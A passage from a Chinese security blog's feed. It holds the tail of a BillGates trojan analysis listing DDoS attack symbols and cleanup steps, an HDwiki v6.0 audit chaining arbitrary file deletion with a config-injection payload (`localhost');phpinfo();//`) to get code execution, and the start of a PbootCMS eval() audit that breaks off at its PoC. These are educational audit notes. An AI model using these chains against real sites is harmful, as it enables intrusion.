class="line">/tmp/EB93A6/996E.elf</span><br><span class="line">/lib/systemd/systemd-udevd --daemon</span><br><span class="line"></span><br><span class="line">Highlighted Actions:</span><br><span class="line"></span><br><span class="line">Highlighted Text:</span><br><span class="line"></span><br><span class="line">11CAttackBase</span><br><span class="line">13CPacketAttack</span><br><span class="line">10CAttackUdp</span><br><span class="line">10CAttackSyn</span><br><span class="line">11CAttackIcmp</span><br><span class="line">10CAttackDns</span><br><span class="line">10CAttackAmp</span><br><span class="line">10CAttackPrx</span><br><span class="line">15CAttackCompress</span><br><span class="line">10CTcpAttack</span><br><span class="line">9CAttackCc</span><br><span class="line">10CAttackTns</span><br><span class="line">9CAttackIe</span><br><span class="line">Attack.cpp</span><br><span class="line">_ZTV10CAttackUdp</span><br><span class="line">_ZN9CAttackIe4StopEv</span><br><span class="line">_ZTV10CAttackAmp</span><br><span class="line">_ZTI9CAttackCc</span><br><span class="line">_ZTV9CAttackIe</span><br><span class="line">_ZN10CAttackAmpC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN13CPacketAttackD1Ev</span><br><span class="line">_ZN10CAttackDns10MakePacketEj</span><br><span class="line">_ZTV9CAttackCc</span><br><span class="line">_ZN9CAttackCc2DoEj</span><br><span class="line">_ZN14CThreadAtkCtrl10StopAttackEv</span><br><span class="line">_ZTS15CAttackCompress</span><br><span class="line">_ZTV10CAttackDns</span><br><span class="line">_ZN10CAttackTns16UpdateCurVariantEj</span><br><span class="line">_ZN10CAttackSyn10MakePacketEj</span><br><span class="line">_ZN23CThreadKernelAtkExcutor10StopAttackEv</span><br><span class="line">_ZN11CAttackBaseD2Ev</span><br><span class="line">_ZTS10CAttackAmp</span><br><span class="line">_ZTI10CAttackAmp</span><br><span class="line">_ZTS10CAttackUdp</span><br><span class="line">_ZN11CAttackIcmpC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN10CAttackPrx10MakePacketEj</span><br><span class="line">_ZTS11CAttackIcmp</span><br><span class="line">_ZN10CAttackUdpD1Ev</span><br><span class="line">_ZN11CAttackIcmp10MakePacketEj</span><br><span class="line">_ZN10CAttackUdpC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZTI11CAttackIcmp</span><br><span class="line">_ZTI10CAttackUdp</span><br><span class="line">_ZN13CPacketAttack6CreateEv</span><br><span class="line">_ZTV13CPacketAttack</span><br><span class="line">_ZN13CPacketAttack7DestroyEv</span><br><span class="line">_ZN10CAttackAmp10MakePacketEj</span><br><span class="line">_ZTI10CAttackPrx</span><br><span class="line">_ZN13CPacketAttack20GetSockTypebyAtkTypeEh</span><br><span class="line">_ZTV11CAttackBase</span><br><span class="line">_ZN10CAttackPrxC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN11CAttackIcmpD1Ev</span><br><span class="line">_ZN10CAttackSynD1Ev</span><br><span class="line">_ZN23CThreadNormalAtkExcutor10StopAttackEv</span><br><span class="line">_ZN9CAttackCcD0Ev</span><br><span class="line">_ZN10CAttackUdp10MakePacketEj</span><br><span class="line">_ZN13CPacketAttack14BuildUdpHeaderEPcjjttij</span><br><span class="line">_ZN9CAttackIeD0Ev</span><br><span class="line">_ZTV10CAttackTns</span><br><span class="line">_ZN9CAttackCc4StopEv</span><br><span class="line">_ZTI10CAttackDns</span><br><span class="line">_ZN13CPacketAttackD0Ev</span><br><span class="line">_ZTI10CAttackSyn</span><br><span class="line">_ZN10CTcpAttack6CreateEv</span><br><span class="line">_ZN13CPacketAttack15BuildIcmpHeaderEPcjjij</span><br><span class="line">_ZN11CAttackIcmpD0Ev</span><br><span class="line">_ZN15CAttackCompressD1Ev</span><br><span class="line">_ZN10CAttackDnsD1Ev</span><br><span class="line">_ZN10CAttackDns6CreateEv</span><br><span class="line">_ZN13CPacketAttack10SendPacketEv</span><br><span class="line">_ZN10CAttackPrxD0Ev</span><br><span class="line">_ZTV10CTcpAttack</span><br><span class="line">_ZTV15CAttackCompress</span><br><span class="line">_ZN13CPacketAttackC2EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN10CAttackSynC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN9CAttackCcD1Ev</span><br><span class="line">_ZN10CAttackAmpD1Ev</span><br><span class="line">_ZN10CAttackPrxD1Ev</span><br><span class="line">_ZN13CPacketAttack4StopEv</span><br><span class="line">_ZN10CAttackAmpD0Ev</span><br><span class="line">_ZTS13CPacketAttack</span><br><span class="line">_ZN10CAttackPrx6CreateEv</span><br><span class="line">_ZN10CTcpAttackD0Ev</span><br><span class="line">_ZTI10CAttackTns</span><br><span class="line">_ZN10CAttackDnsD0Ev</span><br><span class="line">_ZN15CAttackCompress10MakePacketEj</span><br><span class="line">_ZN9CAttackIe16UpdateCurVariantEj</span><br><span class="line">_ZN9CAttackCc6CreateEv</span><br><span class="line">_ZN10CTcpAttack4StopEv</span><br><span class="line">_ZN15CAttackCompressC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZTS10CTcpAttack</span><br><span class="line">_ZN15CAttackCompressD0Ev</span><br><span class="line">_ZTI10CTcpAttack</span><br><span class="line">_ZN10CAttackTnsD1Ev</span><br><span class="line">_ZN13CPacketAttack14BuildTcpHeaderEPchjjttij</span><br><span class="line">_ZTI11CAttackBase</span><br><span class="line">_ZTS9CAttackIe</span><br><span class="line">_ZN9CAttackCc16UpdateCurVariantEj</span><br><span class="line">_ZN10CTcpAttack7DestroyEv</span><br><span class="line">_ZN9CAttackIe2DoEj</span><br><span class="line">_ZN10CTcpAttack16UpdateCurVariantEj</span><br><span class="line">_ZN10CTcpAttackD1Ev</span><br><span class="line">_ZN10CAttackSynD0Ev</span><br><span class="line">_ZN10CAttackTns6CreateEv</span><br><span class="line">_ZTS9CAttackCc</span><br><span class="line">_ZN10CTcpAttack2DoEj</span><br><span class="line">_ZTI9CAttackIe</span><br><span class="line">_ZN10CAttackUdpD0Ev</span><br><span class="line">_ZN13CPacketAttack2DoEj</span><br><span class="line">_ZTV11CAttackIcmp</span><br><span class="line">_ZN10CAttackTnsD0Ev</span><br><span class="line">_ZN10CAttackDnsC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZTV10CAttackPrx</span><br><span class="line">_ZN9CAttackIe7DestroyEv</span><br><span class="line">_ZTV10CAttackSyn</span><br><span class="line">_ZN10CAttackTnsC1ER8CSubTask</span><br><span class="line">_ZN10CAttackTns7DestroyEv</span><br><span class="line">_ZN15CAttackCompress6CreateEv</span><br><span class="line">_ZN9CAttackCc7DestroyEv</span><br><span class="line">_ZTS10CAttackTns</span><br><span class="line">_ZN10CAttackAmp6CreateEv</span><br><span class="line">_ZN10CAttackTns4StopEv</span><br><span class="line">_ZN9CAttackIeD1Ev</span><br><span class="line">_ZN9CAttackIeC1ER8CSubTask</span><br><span class="line">_ZTS10CAttackDns</span><br><span class="line">_ZN11CAttackBaseD0Ev</span><br><span class="line">_ZN11CAttackBaseC2Ev</span><br><span class="line">_ZTI15CAttackCompress</span><br><span class="line">_ZTI13CPacketAttack</span><br><span class="line">_ZN13CPacketAttack15BuildDnsPayloadEPcbPKcitbtbj</span><br><span class="line">_ZN9CAttackIe6CreateEv</span><br><span class="line">_ZN10CAttackTns2DoEj</span><br><span class="line">_ZTS10CAttackSyn</span><br><span class="line">_ZTS11CAttackBase</span><br><span class="line">_ZN15CAttackCompress13CreatePacketsEv</span><br><span class="line">_ZN11CAttackBaseD1Ev</span><br><span class="line">_ZN13CPacketAttackD2Ev</span><br><span class="line">_ZN13CPacketAttack16UpdateCurVariantEj</span><br><span class="line">_ZN10CTcpAttackC1ER8CSubTask</span><br><span class="line">_ZN9CAttackCcC1ER8CSubTask</span><br><span class="line">_ZTS10CAttackPrx</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h1><p>服务器大扫除</p><p>删掉自启动任务、删除<code>/usr/bin/keudl</code>、<code>/usr/bin/aher</code>、<code>/etc/sysxlj</code>、<code>/etc/jourxlv</code>.</p><p>删除了以上东西后,重启发现服务器正常许多,但是如果还是没效果的话,可能是木马替换了系统的命令,多处存在备份,因此需要详细的排查。最好就是做好系统备份或快照,发现异常可查看hash值还是否相同,<code>diff</code> 查看修改内容。如果实在没办法,或者服务器没什么内容的话,安全起见重装系统,加强系统的防护,经常排查漏洞。</p>]]></content>
<summary type="html"><h1 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h1><p>早上老大,发来一个任务,说联系下某服务器负责人,看下服务器什么情况。</p>
<h1 id="经过"><a href="#经过" class</summary>
<category term="BillGates" scheme="https://cr4ckm3.top/tags/BillGates/"/>
<category term="木马分析" scheme="https://cr4ckm3.top/tags/%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90/"/>
</entry>
<entry>
<title>HDwiki v6.0 后台 getshell</title>
<link href="https://cr4ckm3.top/2018/04/25/HDwiki_v6.0_%E5%90%8E%E5%8F%B0getshell/"/>
<id>https://cr4ckm3.top/2018/04/25/HDwiki_v6.0_%E5%90%8E%E5%8F%B0getshell/</id>
<published>2018-04-25T14:37:54.000Z</published>
<updated>2019-08-30T10:00:42.023Z</updated>
<content type="html"><![CDATA[<ul><li>一篇没什么技术含量的代码审计,只是记录下笔记做个好习惯,学习有时候回头看看以前的思路发现问题亦是一种进步。</li></ul><span id="more"></span><h1 id="任意文件删除"><a href="#任意文件删除" class="headerlink" title="任意文件删除"></a>任意文件删除</h1><p>文件定位:<code>control/admin_filemanager.php</code>第<code>156-172</code>行:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//删除文件或文件夹</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">dodelete</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>->post[<span class="string">'currentdir'</span>]) && <span class="keyword">isset</span>(<span class="keyword">$this</span>->post[<span class="string">'fname'</span>])){</span><br><span class="line"><span class="variable">$fname</span>=<span class="keyword">string</span>::hstripslashes(<span class="keyword">$this</span>->post[<span class="string">'currentdir'</span>]).<span class="keyword">$this</span>->post[<span class="string">'fname'</span>];</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(!file_exists(<span class="variable">$fname</span>)){</span><br><span class="line"><span class="keyword">echo</span> <span class="keyword">$this</span>->view->lang[<span class="string">'file_not_exist'</span>];</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">$this</span>->post[<span class="string">'isdir'</span>]== <span class="string">'0'</span>){</span><br><span class="line">@unlink(<span class="variable">$fname</span>);</span><br><span class="line"><span class="keyword">echo</span> basename(<span class="variable">$fname</span>).<span class="keyword">$this</span>->view->lang[<span class="string">'file_delete_success'</span>];</span><br><span class="line">}<span class="keyword">else</span> <span class="keyword">if</span>(<span class="keyword">$this</span>->post[<span class="string">'isdir'</span>] == <span class="string">'1'</span>){</span><br><span class="line"><span class="variable">$str</span>=<span class="variable">$_ENV</span>[<span class="string">'dir'</span>]->dir_delete(<span class="variable">$fname</span>);</span><br><span class="line"><span class="keyword">echo</span> basename(<span class="variable">$fname</span>).<span class="string">":"</span>.<span class="keyword">$this</span>->view->lang[<span class="string">'dir_delete_success'</span>];</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>只判断post是否设置了参数<code>currentdir</code>和<code>fname</code>,以及判断是否存在文件,未对路径进行限制就进行了删除操作。</p><p>因此可直接删除<code>data/install.lock</code>文件。</p><p>找到利用<code>control/admin_filemanager.php</code>的地方进行删除操作:</p><p><img src="/image/hdwiki/delfile.png" alt="dodelete"></p><ul><li>结果:</li></ul><p><img src="/image/hdwiki/delfile2.png" alt="dodelete2"></p><h1 id="Getshell"><a href="#Getshell" class="headerlink" title="Getshell"></a>Getshell</h1><p>文件定位:<code>install/install.php</code>第<code>288-308</code>行:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="number">3</span> :</span><br><span class="line"><span class="variable">$saveconfig</span>=<span class="variable">$_REQUEST</span>[<span class="string">'saveconfig'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$saveconfig</span>==<span class="string">'1'</span>){</span><br><span class="line"><span class="comment">//db parameter</span></span><br><span class="line"><span class="variable">$dbhost</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbhost'</span>]);</span><br><span class="line"><span class="variable">$dbuser</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbuser'</span>]);</span><br><span class="line"><span class="variable">$dbpassword</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbpassword'</span>]);</span><br><span class="line"><span class="variable">$dbname</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbname'</span>]);</span><br><span class="line"><span class="variable">$table_prefix</span> = trim(<span class="variable">$_POST</span>[<span class="string">'table_prefix'</span>]);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 接受到的内容写入CONFIG 文件,用于回显</span></span><br><span class="line"><span class="keyword">if</span> (is_writeable(<span class="variable">$configfile</span>) || (!file_exists(<span class="variable">$configfile</span>))) {</span><br><span class="line"><span class="variable">$configcontent</span> = <span class="string">"<?php</span></span><br><span class="line"><span class="string">define('DB_HOST', '"</span>.<span class="variable">$dbhost</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_USER', '"</span>.<span class="variable">$dbuser</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_PW', '"</span>.<span class="variable">$dbpassword</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_NAME', '"</span>.<span class="variable">$dbname</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_TABLEPRE', '"</span>.<span class="variable">$table_prefix</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('WIKI_URL', '"</span>.<span class="variable">$site_url</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">?>"</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>其中对<code>$dbhost</code>等的赋值只是简单的用了<code>trim()</code>函数。然后就定义了个常量写入了<code>config.php</code>。</p><p>再看<code>config.php</code>:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_HOST'</span>, <span class="string">'localhost'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_USER'</span>, <span class="string">'root'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_PW'</span>, <span class="string">'root'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_NAME'</span>, <span class="string">'wiki'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_CHARSET'</span>, <span class="string">'utf8'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_TABLEPRE'</span>, <span class="string">'wiki_'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_CONNECT'</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'WIKI_FOUNDER'</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'WIKI_CHARSET'</span>, <span class="string">'UTF-8'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'WIKI_URL'</span>, <span class="string">'http://127.0.0.1/hdwiki/v6.0'</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li>构造POC</li></ul><p><img src="/image/hdwiki/poc.png" alt="poc"></p><p>在数据库服务器处,我们可以构造:<code>localhost');phpinfo();//</code>即可。</p><ul><li>结果</li></ul><p>访问<code>config.php</code>:</p><p><img src="/image/hdwiki/getshell.png" alt="getshell"></p>]]></content>
<summary type="html"><ul>
<li>一篇没什么技术含量的代码审计,只是记录下笔记做个好习惯,学习有时候回头看看以前的思路发现问题亦是一种进步。</li>
</ul></summary>
<category term="代码审计" scheme="https://cr4ckm3.top/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="CMS" scheme="https://cr4ckm3.top/tags/CMS/"/>
</entry>
<entry>
<title>PbootCMS v0.9.8 后台 Getshell</title>
<link href="https://cr4ckm3.top/2018/04/11/pbootcms/"/>
<id>https://cr4ckm3.top/2018/04/11/pbootcms/</id>
<published>2018-04-11T15:50:00.000Z</published>
<updated>2019-08-30T10:00:41.103Z</updated>
<content type="html"><![CDATA[<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PBOOT CMS!想伱所想,让一切皆有可能!</span><br><span class="line"></span><br><span class="line">PBOOT CMS!为伱所想,让一切皆有可能!</span><br><span class="line"></span><br><span class="line">PBOOT CMS!做伱所想,让一切皆有可能!</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>php代码审计的初学者,所以就先从D类CMS入手。</p><p>后台默认账号:<code>admin</code> 密码:<code>123456</code></p><p>代码审计分:</p><ul><li>危险函数追踪流</li><li>通读全文流</li><li>黑白盒结合审计流</li></ul><h1 id="开发者标签手册"><a href="#开发者标签手册" class="headerlink" title="开发者标签手册"></a>开发者标签手册</h1><h2 id="IF条件语句"><a href="#IF条件语句" class="headerlink" title="IF条件语句"></a>IF条件语句</h2><ul><li><code>注意:条件语句中字符串需要用单引号或双引号,条件也可以使用原生PHP代码; 所有对其它标签的调用都为字符串,需要加单引号。</code></li></ul><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">{pboot:<span class="keyword">if</span>(<span class="string">'a'</span>==<span class="string">'b'</span>)}</span><br><span class="line">内容<span class="number">1</span></span><br><span class="line">{<span class="keyword">else</span>}</span><br><span class="line">内容<span class="number">2</span></span><br><span class="line">{/pboot:<span class="keyword">if</span>}</span><br></pre></td></tr></table></figure><ul><li>示例一:在IF中使用PHP函数示例:</li></ul><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{pboot:<span class="keyword">if</span>(date(<span class="string">'Y'</span>)==<span class="number">2018</span>)}<span class="number">2018</span>年{/pboot:<span class="keyword">if</span>} </span><br></pre></td></tr></table></figure><ul><li><p>示例二:高亮栏目示例:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><div <span class="class"><span class="keyword">class</span>="<span class="title">nav</span>"></span></span><br><span class="line"><span class="class"><<span class="title">dl</span>></span></span><br><span class="line"><span class="class"> <<span class="title">dt</span>><<span class="title">a</span> <span class="title">href</span>="</span>{pboot:sitepath}/<span class="string">" {pboot:if(0=='{sort:scode}')}class='active'{/pboot:if}>首页</a></dt></span></span><br><span class="line"><span class="string"></dl></span></span><br><span class="line"><span class="string">{pboot:nav parent=0}</span></span><br><span class="line"><span class="string"><dl></span></span><br><span class="line"><span class="string"><dt><a href="</span>[nav:link]<span class="string">" {pboot:if('[nav:scode]'=='{sort:tcode}')}class='active'{/pboot:if}>[nav:name]</a></dt></span></span><br><span class="line"><span class="string"><dd></span></span><br><span class="line"><span class="string">{pboot:2nav parent=[nav:scode]}</span></span><br><span class="line"><span class="string"><a href="</span>[<span class="number">2</span>nav:link]<span class="string">" {pboot:if('[2nav:scode]'=='{sort:scode}')}class='active'{/pboot:if}>[2nav:name]</a> |</span></span><br><span class="line"><span class="string">{/pboot:2nav}</span></span><br><span class="line"><span class="string"></dd></span></span><br><span class="line"><span class="string"></dl></span></span><br><span class="line"><span class="string">{/pboot:nav}</span></span><br><span class="line"><span class="string"></div></span></span><br></pre></td></tr></table></figure></li><li><p>示例三:嵌套IF:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">{pboot:<span class="keyword">if</span>(<span class="string">'a'</span>==<span class="string">'b'</span>)}</span><br><span class="line">{pboot:<span class="number">2</span><span class="keyword">if</span>(<span class="string">'a'</span>==<span class="string">'b'</span>)}</span><br><span class="line">内容<span class="number">1</span></span><br><span class="line">{<span class="number">2</span><span class="keyword">else</span>}</span><br><span class="line">内容<span class="number">2</span></span><br><span class="line">{/pboot:<span class="number">2</span><span class="keyword">if</span>}</span><br><span class="line">{<span class="keyword">else</span>}</span><br><span class="line">内容<span class="number">3</span></span><br><span class="line">{/pboot:<span class="keyword">if</span>}</span><br></pre></td></tr></table></figure></li></ul><p>这里说了可执行PHP语句,但要插在<code>IF条件标签</code>,例如:</p><p><code>{pboot:if(php语句)} {/pboot:if}</code></p><p>然后再返回文件查看源代码文件:</p><p>该文件是:标签解析引擎控制器,也就是解析标签的。</p><p>代码的<code>1273~1314</code>为关于IF条件语句的。</p><p><code>/apps/home/controller/ParserController.php</code></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 解析IF条件标签</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">parserIfLabel</span>(<span class="params"><span class="variable">$content</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$pattern</span> = <span class="string">'/\{pboot:if\(([^}]+)\)\}([\s\S]*?)\{\/pboot:if\}/'</span>;</span><br><span class="line"> <span class="variable">$pattern2</span> = <span class="string">'/pboot:([0-9])+if/'</span>;</span><br><span class="line"> <span class="keyword">if</span> (preg_match_all(<span class="variable">$pattern</span>, <span class="variable">$content</span>, <span class="variable">$matches</span>)) {</span><br><span class="line"> <span class="variable">$count</span> = count(<span class="variable">$matches</span>[<span class="number">0</span>]);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$count</span>; <span class="variable">$i</span> ++) {</span><br><span class="line"> <span class="variable">$flag</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">eval</span>(<span class="string">'if('</span> . <span class="variable">$matches</span>[<span class="number">1</span>][<span class="variable">$i</span>] . <span class="string">'){$flag="if";}else{$flag="else";}'</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="string">'/([\s\S]*)?\{else\}([\s\S]*)?/'</span>, <span class="variable">$matches</span>[<span class="number">2</span>][<span class="variable">$i</span>], <span class="variable">$matches2</span>)) { <span class="comment">// 判断是否存在else</span></span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$flag</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'if'</span>: <span class="comment">// 条件为真</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$matches2</span>[<span class="number">1</span>])) {</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="variable">$matches2</span>[<span class="number">1</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'else'</span>: <span class="comment">// 条件为假</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$matches2</span>[<span class="number">2</span>])) {</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="variable">$matches2</span>[<span class="number">2</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">elseif</span> (<span class="variable">$flag</span> == <span class="string">'if'</span>) {</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="variable">$matches</span>[<span class="number">2</span>][<span class="variable">$i</span>];</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 无限极嵌套解析</span></span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="variable">$pattern2</span>, <span class="variable">$out_html</span>, <span class="variable">$matches3</span>)) {</span><br><span class="line"> <span class="variable">$out_html</span> = str_replace(<span class="string">'pboot:'</span> . <span class="variable">$matches3</span>[<span class="number">1</span>] . <span class="string">'if'</span>, <span class="string">'pboot:if'</span>, <span class="variable">$out_html</span>);</span><br><span class="line"> <span class="variable">$out_html</span> = str_replace(<span class="string">'{'</span> . <span class="variable">$matches3</span>[<span class="number">1</span>] . <span class="string">'else}'</span>, <span class="string">'{else}'</span>, <span class="variable">$out_html</span>);</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="keyword">$this</span>->parserIfLabel(<span class="variable">$out_html</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 执行替换</span></span><br><span class="line"> <span class="variable">$content</span> = str_replace(<span class="variable">$matches</span>[<span class="number">0</span>][<span class="variable">$i</span>], <span class="variable">$out_html</span>, <span class="variable">$content</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$content</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>关键在:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$pattern</span> = <span class="string">'/\{pboot:if\(([^}]+)\)\}([\s\S]*?)\{\/pboot:if\}/'</span>;</span><br><span class="line"><span class="variable">$pattern2</span> = <span class="string">'/pboot:([0-9])+if/'</span>;</span><br><span class="line"><span class="keyword">if</span> (preg_match_all(<span class="variable">$pattern</span>, <span class="variable">$content</span>, <span class="variable">$matches</span>)) {</span><br><span class="line"> <span class="variable">$count</span> = count(<span class="variable">$matches</span>[<span class="number">0</span>]);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$count</span>; <span class="variable">$i</span> ++) {</span><br><span class="line"> <span class="variable">$flag</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">eval</span>(<span class="string">'if('</span> . <span class="variable">$matches</span>[<span class="number">1</span>][<span class="variable">$i</span>] . <span class="string">'){$flag="if";}else{$flag="else";}'</span>);</span><br></pre></td></tr></table></figure><p>只经过简单的正则匹配之后就赋值,然后<code>eval()</code>执行。</p><p>到此需要寻在利用点。</p><h1 id="Poc"><a href="#Poc" class="headerlink" 